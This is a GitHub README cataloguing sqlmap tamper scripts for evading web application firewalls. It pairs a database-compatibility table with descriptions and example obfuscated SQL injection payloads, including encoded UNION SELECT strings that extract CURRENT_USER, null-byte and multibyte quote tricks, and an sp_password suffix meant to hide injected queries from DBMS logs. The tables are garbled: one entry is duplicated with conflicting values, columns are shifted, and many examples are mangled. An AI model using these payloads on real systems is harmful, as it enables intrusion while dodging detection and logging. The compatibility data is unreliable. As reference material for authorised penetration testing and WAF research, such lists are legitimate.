Skip to content

Latest commit

 

History

History
100 lines (95 loc) · 22 KB

README.md

File metadata and controls

100 lines (95 loc) · 22 KB

sqlmap-tampers

(*) It might work for all versions. (-) Does not apply

TAMPER MySQL MSSQL Oracle PostgreSQL
apostrophemask * * * *
apostrophenullencode - - - -
appendnullbyte * * * *
base64encode 4,5,5.5 2005 10g -
between 5.1 - - -
bluecoat * * * *
apostrophemask 9.0.3 2000,2005 - 9.3
charunicodeencode 4,5.0 and 5.5 2005 10g 8.3,8.4,9.0
charencode * - - -
commalessmid * - - -
concat2concatws * * * *
equaltolike * * * *
greatest < 5.1 - - -
halfversionedmorekeywords 5.0 and 5.5 - - -
ifnull2ifisnull * * * *
informationschemacomment 4,5.0,5.5 2005 10g 8.3,8.4,9.0
lowercase 5.0 - - -
modsecurityversioned 5.0 - - -
modsecurityzeroversioned * * * *
multiplespaces * * * *
nonrecursivereplacement * * * *
overlongutf8 5.1.56,5.5.11 2000, 2005 N/A 9.0
percentage 4, 5.0,5.5 2005 10g 8.3,8.4,9.0
randomcase * * * *
randomcomments * * * *
securesphere 4,5.0,5.5 2005 10g 8.3,8.4,9.0
space2comment - - - -
space2dash 4.0,5.0 - - -
space2hash >= 5.1.13 - - -
space2morehash - 2000, 2005 - -
space2mssqlblank * * - -
space2mssqlhash * * * *
space2plus 4,5.0,5.5 2005 10g 8.3,8.4,9.0
space2randomblank - * - -
sp_password * * * *
symboliclogical * * * *
unionalltounion * * * *
unmagicquotes 4, 5.0,5.5 2005 10g 8.3,8.4,9.0
uppercase * * * *
varnish * - - -
versionedkeywords >=5.1.13 - - -
versionedmorekeywords * * * *
xforwardedfor * * * *
Name Description Example Oracle PostgreSQL
apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' * *
apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart 1 AND %271%27=%271' - -
appendnullbyte.py Appends encoded NULL byte character at the end of payload 1 AND 1=1' * *
base64encode.py Base64 all characters in a given payload MScgQU5EIFNMRUVQKDUpIw==' 10g -
between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' 1 AND A NOT BETWEEN 0 AND B--' - -
bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator SELECT%09id FROM users where id LIKE 1' * *
chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded) %2553%2545%254C%2545%2543%2554%2520%2 546%2549%2545%254C%2544%2520%2546%2552 %254F%254D%2520%2554%2541%2542%254C%2545' - 9.3
commalesslimit.py Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' 'LIMIT 3 OFFSET 2'' 10g 8.3,8.4,9.0
commalessmid.py Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' MID(VERSION() FROM 1 FOR 1)' - -
concat2concatws.py Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' CONCAT_WS(MID(CHAR(0),0,0),1,2)' - -
charencode.py Url-encodes all characters in a given payload (not processing already encoded) %53%45%4C%45%43%54%20%46%49%45%4C%4 4%20%46%52%4F%4D%20%54%41%42%4C%45' * *
charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) %u0053%u0045%u004C%u0045%u0043%u0054%u 0020%u0046%u0049%u0045%u004C%u0044%u002 0%u0046%u0052%u004F%u004D%u0020%u0054% u0041%u0042%u004C%u0045' * *
equaltolike.py Replaces all occurances of operator equal ('=') with operator 'LIKE' SELECT * FROM users WHERE id LIKE 1' - -
escapequotes.py Slash escape quotes (' and ") 1\\" AND SLEEP(5)#' - -
greatest.py Replaces greater than operator ('>') with 'GREATEST' counterpart 1 AND GREATEST(A,B+1)=A' * *
halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword "value'/!0UNION/!0ALL/!0SELECT/!0CONCAT (/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST( /!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR (32)),/!0CHAR(58,97,110,121,58)),/!0NULL,/!0N ULL#/!0AND 'QDWa'='QDWa" 10g 8.3,8.4,9.0
ifnull2ifisnull.py Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' IF(ISNULL(1),2,1)' - -
modsecurityversioned.py Embraces complete query with versioned comment 1 /!30874AND 2>1/--' - -
modsecurityzeroversioned.py Embraces complete query with zero-versioned comment 1 /!00000AND 2>1/--' * *
multiplespaces.py Adds multiple spaces around SQL keywords 1 UNION SELECT foobar' * *
nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters 1 UNIOUNIONN SELESELECTCT 2--' * *
percentage.py Adds a percentage sign ('%') infront of each character %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' N/A 9.0
overlongutf8.py Converts all characters in a given payload (not processing already encoded) SELECT%C0%AAFIELD%C0%AAFROM%C0%AAT ABLE%C0%AAWHERE%C0%AA2%C0%BE1' 10g 8.3,8.4,9.0
randomcase.py Replaces each keyword character with random case value INseRt' * *
randomcomments.py Add random comments to SQL keywords I//N//SERT' * *
securesphere.py Appends special crafted string "1 AND 1=1 and '0having'='0having'" 10g 8.3,8.4,9.0
sp_password.py Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs 1 AND 9227=9227-- sp_password' - -
space2comment.py Replaces space character (' ') with comments '/**/' SELECT//id//FROM/**/users' - -
space2dash.py Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' - -
space2hash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') 1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227 =9227' - -
space2morehash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23 lujYFWfv%0A9227=9227' - -
space2mssqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters SELECT%0Eid%0DFROM%07users' * *
space2mssqlhash.py Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') 1%23%0AAND%23%0A9227=9227' 10g 8.3,8.4,9.0
space2mysqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters SELECT%A0id%0BFROM%0Cusers' - -
space2mysqldash.py Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') 1--%0AAND--%0A9227=9227' * *
space2plus.py Replaces space character (' ') with plus ('+') SELECT+id+FROM+users' * *
space2randomblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters SELECT%0Did%0DFROM%0Ausers' * *
symboliclogical.py Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) "1 %26%26 '1'='1" 10g 8.3,8.4,9.0
unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT -1 UNION SELECT' * *
unmagicquotes.py Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) 1%bf%27 AND 1=1-- ' - -
uppercase.py Replaces each keyword character with upper case value INSERT' - -
varnish.py Append a HTTP header 'X-originating-IP' http://h30499.www3.hp.com/t5/Fortify-Application-S ecurity/Bypassing-web-application-firewalls-using-HT TP-headers/ba-p/6418366 * *
versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment 1/!UNION//!ALL//!SELECT//!NULL/,/!NULL /,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST (CURRENT_USER()/!AS//!CHAR/),CHAR(32)),CH AR(58,100,114,117,58))# * *
versionedmorekeywords.py Encloses each keyword with versioned MySQL comment 1/!UNION//!ALL//!SELECT//!NULL/,/!NULL /,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFN ULL/(CAST(/!CURRENT_USER/()/!AS//!CHAR /),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#'
xforwardedfor.py Append a fake HTTP header 'X-Forwarded-For' headers["X-Forwarded-For"]'